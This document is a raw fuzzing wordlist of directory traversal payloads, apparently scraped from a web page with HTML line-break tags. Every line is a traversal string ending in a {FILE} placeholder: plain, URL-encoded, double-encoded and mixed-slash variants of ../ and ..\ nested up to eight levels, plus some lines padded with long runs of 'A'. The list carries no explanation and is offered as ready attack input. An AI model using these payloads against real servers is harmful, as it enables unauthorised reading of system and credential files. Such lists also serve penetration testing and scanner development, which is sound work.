%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
